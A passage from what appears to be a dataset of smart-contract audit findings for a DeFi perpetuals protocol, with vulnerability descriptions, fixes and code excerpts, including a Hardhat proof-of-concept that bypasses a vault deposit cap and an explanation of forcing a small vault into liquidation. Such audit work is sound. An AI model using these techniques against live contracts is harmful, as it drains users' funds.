maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf oracle version at t = 100 is invalid, then pending global maker = 1500 (at t = 200). 
However, due to this check in _invariant:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except update to reduce maker position by 500+, which might not be even possible in 1 update depending on maker distribution between users. For example, if 5 users have maker = 300 (1500 total), then no single user can update to reduce maker by 500. This will temporarily brick Market (all updates will revert) until coordinator increases maker limit. If the limit is already close to max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of maker limit, because global maker will exceed 2^62-1 in calculations and will revert when trying to store it).\\nThe same issue can also cause the other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nUser unexpectedly becomes liquidatable with too high position (for example: position 500 -> pending 0 -> pending 500 - will make current = 1000 if middle oracle version is invalid)чThe same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle can cause the position to be less than 0. 
This issue can be resolved in the same way, by introducing some `openable` value (calculated similarly to `closable`, but in reverse - when position is increased, it's increased, when position is decreased, it doesn't change) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor local position - calculate maxMagnitude amount from `settled + local openable` instead of absolute pending position values for margined/maintained calculations.чIf current maker is close to maker limit, and some user(s) reduce their maker then immediately increase back, and the oracle version is invalid, maker will be above the maker limit and the Market will be temporarily bricked until coordinator increases the maker limit. Even though it's temporary, it is still bricked for some time and coordinator is forced to increase maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be reduced back.\\nAlso, for some low-price tokens, the maker limit can be close to max possible value (2^62-1 is about `4*1e18` or Fixed6(4*1e12)). If the token price is about $0.00001, this means such maker limit allows `$4*1e7` or $40M. So, if low-value token with $40M maker limit is used, this issue will lead to maker overflow 2^62-1 and bricking the Market permanently, with all users being unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. 
For example, if the maker is close to limit, any maker reducing the position will have some other user immediately take up the freed up maker space, so things like global maker change of: 1000->900->1000 are easily possible and any invalid oracle version will likely cause the maker overflowing the limit.ч```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n -`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent onesчmediumчThe new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n 
_localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.чMove addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\nчThe new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).ч```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n -`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.чmediumчAccording to protocol design (from KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. 
Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until `Market` is unpaused. This happens, because `KeeperOracle.commit` will revert in market callback, as `commit` iterates through all requested markets and calls `update` on all of them, and `update` reverts if the market is paused.\\nThis means that pausing of just 1 market will basically stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch oracle provider from upstream `OracleFactory`, because provider switch still requires the latest version of previous oracle to be commited, and it will be impossible to commit it (both valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for some other reasons, for example if maker exceeds the maker limit after invalid oracle as described in the other issue.\\nAnd for another problem (although a low severity, but caused in the same lines), if too many markets are authorized to call `KeeperOracle.request`, the markets callback gas usage might exceed block limit, making it impossible to call `commit` due to not enough gas. 
Currently there is no limit of the amount of Markets which can be added to callback queue.\\n`KeeperOracle.commit` calls back `update` in all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\nчConsider catching and ignoring revert, when calling `update` for the market in the `_settle` (wrap in try .. 
catch).\\nConsider adding a limit of the number of markets which are added to callback queue in each oracle version, or alternatively limit the number of authorized markets to call `request`.чOne paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).ч```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n -Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit capчmediumчVault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that `_maxDeposit` function, which calculates max amount of assets allowed to be deposited is incorrect and always includes vault claimable assets even when the vault is at the cap. This allows malicious (or even regular) user to deposit unlimited amount bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users risk, for example when the vault is still in the testing phase and owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. 
However, the formula used to calculate max deposit is incorrect, it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at the cap or above cap, which is apparently wrong. The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log(\"start\");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log(\"Deposit 100\")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log(\"Deposit 10 revert\")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log(\"Redeem 50\")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n 
await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log(\"Deposit 100\")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log(\"Deposit 50\")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)чThe correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\nчMalicious and regular users can bypass vault deposit cap, either intentionally or just in the normal operation when some users redeem and claimable assets are available in the vault. 
This breaks core contract security function of limiting the deposit amount and can potentially lead to big user funds loss, for example at the initial stages when the owner still tests the oracle provider/market/etc and wants to limit vault deposit if anything goes wrong, but gets unlimited deposits instead.ч```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n -Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's smallчmediumчVault opens positions in the underlying markets trying to keep leverage at the level set for each market by the owner. However, it uses sum of market collaterals which exclude keeper and position fees. But pending fees are included in account health calculations in the `Market` itself.\\nWhen vault TVL is high, this difference is mostly unnoticable. However, if vault is small and keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimum amounts from different accounts in the same oracle version. 
This keeps/increases vault calculated collateral, but its pending collateral in underlying markets reduces due to fees, which increases actual vault leverage, so it's possible to increase vault leverage up to maximum leverage possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but keeper fee is large enough, the other issue reported allows to set vault leverage to max (according to margined amount) and then this issue allows to reduce vault collateral even further down to maintained amount and then commit slightly worse price and liquidate the vault.\\nWhen vault leverage is calculated, it uses collateral equal to sum of collaterals of all markets, loaded as following:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, market's `local.collateral` excludes pending keeper and position fees. 
But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying markets leverage calculations, allowing to increase vault's actual leverage.чConsider subtracting pending fees when loading underlying markets data context in the vault.чWhen vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.ч```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n -`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to send 0 
fee to liquidator or incorrect order executionчmediumчThere was a slight change of oracle versions handling in 2.1: now each requested oracle version must be commited, either as valid or invalid. This means that now the latest version can be invalid (price = 0). This is handled correctly in `Market`, which only uses timestamp from the latest oracle version, but the price comes either from latest version (if valid) or `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses price from `oracle.latest` without verifying if it's valid, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latest price = 0 leads to 2 main problems:\\nLiquidations orders in MultiInvoker will send 0 liquidation fee to liquidator (will liquidate for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price didn't reach the trigger price, or false even if the real prices reached the trigger price)\\n`MultiInvoker._latest` has the following code for latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from the `_latest`, it isn't changed anywhere else. 
Notice that there is no check for latest oracle version validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning it remains 0 (invalid). This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. 
This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. 
For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.ч`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`чliquidation done after invalid oracle version via `MultiInvoker` `LIQUIDATE` action will charge and send 0 liquidation fee from the liquidating account, thus liquidator loses these funds.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and will be executed when price is far from reaching the trigger price. This loses user funds due to unexpected execution price of the pending order.ч```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n -`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revertчmediumч`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. 
For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. 
in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n 
.sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\nчWhen calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif timestamp of pending position at index currentId equals current oracle version, then add the difference between position size at currentId and previous position size to `closable` (both when that position increases and decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = 20 then initialize `closable` to `10` (latest) add (pending-latest) = (20-10) to `closable` (closable = 20)чIn the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)ч```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n -MultiInvoker closableAmount the calculation logic is wrongчmediumчin `MultiInvoker._latest()` The incorrect use of `previousMagnitude = latestPosition.magnitude()` has led to an error in the calculation of `closableAmount`. 
This has caused errors in judgments that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. The calculation formula is as follows in the code: `Market.sol`\\n```\\n    function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n        context.pendingCollateral = context.pendingCollateral\\n            .sub(newPendingPosition.fee)\\n            .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n  \\n        context.closable = context.closable\\n            .sub(context.previousPendingMagnitude\\n                .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n        context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n        if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n            context.maxPendingMagnitude = newPendingPosition.magnitude();\\n    }\\n```\\n\\nIt will loop through `pendingPosition`, and each loop will set the variable `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPosition`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. 
The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. 
This mistake leads to an incorrect calculation of `closableAmount`.ч```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\nчThe calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use this 
variable, such as `_liquidationFee()`.ч```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n -interfaceFee Incorrectly converted uint40 when storedчmediumчThe `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. 
